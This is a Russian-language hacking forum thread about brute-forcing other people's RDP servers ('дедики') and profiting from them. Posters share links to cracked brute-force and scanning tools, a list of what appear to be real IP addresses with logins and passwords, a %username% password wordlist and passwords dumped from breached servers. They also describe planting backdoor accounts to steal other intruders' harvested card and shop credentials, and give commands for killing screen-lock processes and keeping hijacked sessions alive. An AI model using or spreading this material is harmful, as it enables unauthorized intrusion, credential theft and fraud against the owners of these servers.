Что нового?
Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили XakerPlus!

Учётка, дедик, брут.

N

nokia

Гость
https://youtu.be/9dTQLE97kys

NLBrute 1.2http://alligator.cash/index.php/topic/8934-nlbrute-12-cracked/

ip и диапазоныhttp://alligator.cash/index.php/topic/2267-ip-%D0%B8-%D0%B4%D0%B8%D0%B0%D0%BF%D0%B0%D0%B7%D0%BE%D0%BD%D1%8B/?p=6403

bat.exe

http://ge.tt/208X0Pf2

MasScan GUI

http://ge.tt/7DIi0Pf2

для тренировки

181.228.150.128:[email protected]/* */;fernando123 Martin;martin123 Personal;admin123 Jose;jose123
86.120.213.67:[email protected]\administrator;[email protected]
85.126.80.34:[email protected]\Gerhard;Gerhard2011
181.54.245.204:[email protected];123456 remoto3;123456 remoto1;123456
190.3.21.198:[email protected];fsloper1234 mandrade;mandrade tmachuca;tmachuca1234 cgoicochea;cgoicochea1234
213.135.132.229:[email protected]_KPD\test;654321
95.131.29.49:[email protected]\test;123QWEasd
203.48.112.52:[email protected]\IT;Welcome2014
23.16.106.99:[email protected]\IT;!@#QWEasd
217.197.124.26:[email protected]\test;test
46.175.37.6:[email protected]\test;test
176.58.60.91:[email protected]_VM\test;test
46.175.151.218:[email protected]\test;test
176.101.221.227:[email protected]\test;test
83.69.212.206:[email protected]\test;P@$$w0rd
78.138.135.46:[email protected]\test;Asdf1234
91.243.4.87:[email protected]\test;test1
77.222.153.85:[email protected]\test;test123
77.34.5.130:[email protected]_POL1_V\test;Test
193.124.56.75:[email protected]\test;test123 locker
 
@nokia или кто может  знает подскажите пожалуйста если в пароли добавить 

%username%

%Username%

что это будет значить при бруте ? типа он ставит при переборе пароль такой же как и логин ?

 
Знает кто-нибудь, где можно достать словари для брута разных стран? Допустим испанские логины или французские.

 
nokia, батник от Gurona чем лучше или хуже от того что в твоем посте или можно использовать оба? вот этот  http://ge.tt/4NqARJj2

 
a.n.lekomtsev написал(а):
Знает кто-нибудь, где можно достать словари для брута разных стран? Допустим испанские логины или французские.
Нажмите для раскрытия...
borodach написал(а):
Меня тоже интересует )
Нажмите для раскрытия...
Nikonik написал(а):
nokia, батник от Gurona чем лучше или хуже от того что в твоем посте или можно использовать оба? вот этот  http://ge.tt/4NqARJj2
Нажмите для раскрытия...


Граждане мазурики, буду краток.



Вот Вам Loginhttp://www.fayloobmennik.net/6909048 и вот Вам Password

Пароль везде 123

  По чесноку, то вы не тем занимаетесь, объясняю почему.

Во первых, брутить надо на таком дедике где кроме Вас ни кого нет (ну край админ еще)​.

Для этого идем СЮДА и покупаем за свои кровные, заработанные не посильным трудом у токарного станка ​или на Беломор-Канале.

​Кто не знает как купить удаленный сервер за рубли, переходим вот к НЕМУ, он дает шестой разряд, а это мастер или хуярим дальше у станка!

  ​Дальше смотрим ЭТО

​После того как вы приобрели за свои кровные удаленный сервер, переходим к пункту два.​

​Лично я бручу на два логина (если вообще бручу, ну это далее)

​Administrator

​Admin

​остальной шлак по типу user-huyuzer мне нах не сдался! Для этого есть товарищи, которые брутят за меня.

  А вот паролей закидываю штук по тыщщи или более, далее как с бинами. Если с этой тыщщи что-то набрутилось, то этот пасс в отдельный лист.

Более этой тыщщай я не бручу. И т.д.​

​  Далее о главном! Если вы будете брутить на дедике где народу как в хате с гастарбайтерами, то вы будете брутить на таких как я примерно.

​  Почему?

Потому-что когда я набрутил дедиков с логином Administrator и Admin, то я создаю там учетку, эту учетку я выкидываю на любом форуме где есть раздача дедиков, но!, учетку от Admina оставляю себе. Суть ясна?

  ​У меня есть так-эдак дедиков двадцать-десять или семь, где брутят дедики с выкинутой мной учеткой.

Временнами я просто захожу под учеткой Adminiustrator и просто копирую лист с good или логинами и паролями (кардеров) от шопов и т.п.

  Я не разу еще не покупал карты, соксы, майлы и т.д. , все это мне преподносят товарищи, которые пожалели пару-тройку кровно заработанных рублей у токарного станка, что-бы купить удаленный сервер!!!!



​Вот Вам пример, гражданин трудился, собирал образ, отключал все не нужное в винде, вообщем думаю день-другой потратил. даже о Вашей безопастности позаботился, установив антивирус. Вроде все гладко, да? Но!

Если копнуть за этот антивирус, то мы узнаем, что:

 Если у Вас на удаленном сервере стоит антивирус тотал 360 и также стоит на Вашем компе, то! Вы без проблем можете подключатся к удаленному серверу через антивирус 360!!!

​  Короче закругляюсь, фантазируйте и сами охуеете!!!! Только тссс, а-то как говаривал один товарищ, "Если знают двое-знает и свинья"

http://savepic.ru/13337061.png​
 
Вытянул сегодня админские пароли с дедиков и немного прикуел!

* Username :

* Domain   : 
* Password : 3g}+[2y+4xlY4(H)H![OB+8|$p(dpKfjhOz
 
* Username :
* Domain   : 
* Password : }X.!SoaG=%k.aA-$!Te|I=_Mwhd8anRsrQ4
 
* Username :
* Domain   :
* Password : $%lyhT4C_]+m?lXVX6:)LA7m#JgO[iiX|9+
 
C этим шифрованием дедиков по ходу скоро вообще хрен чего набрутишь, так-что на такие пароли как:
%username%
\%username%/
%username%@com
111%username%111
123%username%321
123%username%123
@%username%@
!!!%username%!!!
(%username%)
%username%123!@#
%username%qwerty
%username%123123
%username%123qwe
%username%qwe123
%username%.123!
%username%@qwe
%username%@qwe123
%username%@123qwe
%username%@123
%username%@abc
%Username%123
%Username%
%Username%!!!
%Username%@123
%Username%@abc
%Username%.abc
%Username%.123
%Username%.qwe
%Username%1
%USERNAME%123
%USERNAME%1
_%USERNAME%_
%USERNAME%@123
%USERNAME%2017
%USERNAME%2016
%USERNAME%qwe
%USERNAME%QWE
%USERNAME%!@#
%Username%!@#
%username%12345
%username%123456
%username%1234567
%username%12345678
%username%123456789
%username%1234567890
%username%@
%username%@123
%username%!!!
%username%1
%username%11
%username%111
%username%1111
%username%11111
%username%777
%username%.123
%username%.1
%username%123
%username%abc
%Username%%Username%
%username%%username%
%username%%username%1
%username%%username%123
123%username%
@%username%
1%username%
qwe%username%
QWE%USERNAME%QWE
qwe%username%qwe
1%username%1
!%username%!
!@#%username%!@#
%username%!@#
%username%abc
%username%2016
%username%2017
qweabc
qwe@abc
abcqwe
ABCqwe
QweAbc
qwerty123456
123456qwerty

и т.д.
 
можете вообще забыть!
 
Ну а кто сомневается - тестируйте! :)
ТЫРКС 
 
(Вытянул сегодня админские пароли с дедиков и немного прикуел!) чем вытянул  :D

 
Xrahitel написал(а):
(Вытянул сегодня админские пароли с дедиков и немного прикуел!) чем вытянул  :D
Нажмите для раскрытия...
bnFJN27.png
 ​
UoYjCbW.png
 
Отвалился дедик? Брутим его по новой. Вставляем его айпишник и нимного добовляем.
 ​
 ​
пас местный (с маленькой буквы)
p.s. забыл добавить: сканит уже на открытые порты (ни хуже платного софта) только на один порт.
 
Последнее редактирование:
Потому-что когда я набрутил дедиков с логином Administrator и Admin, то я создаю там учетку, эту учетку я выкидываю на любом форуме где есть раздача дедиков, но!, учетку от Admina оставляю себе. Суть ясна?

  ​У меня есть так-эдак дедиков двадцать-десять или семь, где брутят дедики с выкинутой мной учеткой.

Временнами я просто захожу под учеткой Adminiustrator и просто копирую лист с good или логинами и паролями (кардеров) от шопов и т.п.

  Я не разу еще не покупал карты, соксы, майлы и т.д. , все это мне преподносят товарищи, которые пожалели пару-тройку кровно заработанных рублей у токарного станка, что-бы купить удаленный сервер!!!!

http://mepic.ru/up/pic_b/03aef3fa26ec2f24cacc781a985cd372.png

http://mepic.ru/up/pic_b/03d4007fb23bd14bef82c29d3ee4f0b1.png

http://mepic.ru/up/pic_b/97ccb8876fced43ed4fe6e85cb34c6c3.png

http://mepic.ru/up/pic_b/c4d4d0d8aff40c9e7a1fffaac51bc56b.png

http://mepic.ru/up/pic_b/c15355f254c725af10f1852d5f2ed60b.png

http://mepic.ru/up/pic_b/05ede2691c0f4e8e1e08e6b15ffa8de1.png
 
Дедики еще кого интересуют?
Просто все видосы забанили могу поискать и по новой выложить.
 
run:\\Talberglaw-dc (папки)   
Немедленная перезагрузка через командную строку:shutdown -r -t 0
 
run: secpol.msc (politica cekuri)
lusrmgr.msc
 
Выполнить compmgmt.msc > просмотр событий
 
dsa.msc лежат юзеры
 
cmd.exe /k TASKKILL /F /IM DTLEP.exe
cmd.exe /k TASKKILL /F /IM XLWinLock.exe
cmd.exe /k TASKKILL /F /IM limited.exe
cmd.exe /k TASKKILL /F /IM Desktop Lock.exe 
cmd.exe /k TASKKILL /F /IM ClearLock.exe
 
Политики Безопасности вызывается путём ввода в строку Выполнить (Run) в меню Пуск (Start) команду
 "secpol.msc", и мы уже имеем перед собой окно Политики 
безопасности почти за 1 секунду! Далее,
 к примеру, нам нужен модуль Управления компьютером, который так же 
находиться в Администрировании.
 Лезть за ним очень долго и нудно, поэтому мы, чтобы вызвать этот модуль,
 в котором как раз, если вы не забыли,
 находятся разделы конфигурации Локальных пользователей и групп, 
(мы за несколько секунд сделаем то, что могли бы делать несколько минут, я имею ввиду, конечно же,
 через сеть Интернет, как вы понимаете, так как связь с другим компьютером всегда замедляет посланную 
вами команду,и её выполнение, как минимум, на несколько секунд) вызываем модуль путём
 ввода "compmgmt.msc" и получаем Конфигуратор управления компьютером и редактирования его параметров, а,
 в данном случае, создание пользователя и присвоение ему административных прав доступа. Далее,
 вызов Терминального серверного клиента конфигурации проводим командой "tscc.msc".
И, наконец, если мы хотим вызвать Конфигуратора Сервиса Терминала, а именно Terminal Services Manager,
 мы используем команду "tsadmin.msc", что позволит нам наблюдать за тем, кто сейчас на 
сервере из пользователей,а также чем они занимается.
Ещё в нём есть опции не только наблюдения, но и управления активными пользователями, 
при использовании которых можно завершать работу сессии пользователей, закрывать программы, 
ими используемые. 
Далее, при наличии пароля доступа к аккаунту пользователя, 
можно войти в его сессию и, таким образом, 
просмотреть в живую чем он занимается и какие программы работают, и, по мере необходимости,
 вводить коррективы в работу программ и прав доступа к ним, контролировать их работу.
 
Кому как но я привык ручками, тем более можно по дороге посмотреть кто ещё бывал на дедике и наследил.
Также не забывай в taskmgr заходить там порой бруты работают в соседних учётках.
Смотрим что за учётка и идём в коммандную строку прописав 
net user
Заходим в учётку и собераем урожай,
 
Зайди пуск=>сmd=>control userpasswords2=>ok итак перед тобой список юзеров и групп,
 к которым они относятся, делай че хочешь
 
 
это работает и для вин 2012, проверено мной.
gpedit.msc --> 
Computer configuration - 
Administrative templates - 
Windows Components - 
Remote Desktop Services - 
Remote Desktop Session Host - 
Session Time Limits
Меняем все параметри на "Never"
 
P.S. ищу куда все грузить, пока просто читайте, потом картинка сложится по себе помню.
 ​
2022-11-26-100955.png


позже буду архивы подгружать, потом все распишу или сниму как и что надо делать для брута дедиков.

xd.png


https://cloud.mail.ru/public/8oDQ/uKuLKB4mt

111.png


Мля! до сих-пор пашет!!!! самый первый - самый крутой! (мое мнение)

Пока не забыл парняги, кто собирается заниматся брутом RDP(дедиков)," (новеньким говорю)", настройте машину !!!!, первым делом!, потом забудете или поздно будет.

Иногда бывает (рассказывали) что попадались дедики с биржой открытой, с криптокошельком (от цифер руки трястись начинали (говорят), фермы, киви с безумными цыферами и т.д..

А того хуже  >>>Administrator;bank;tender; ну в таком роде и не знали что делать, вот такая хуйня малята.

 
Последнее редактирование:
Войдите или зарегистрируйтесь для ответа.


Сверху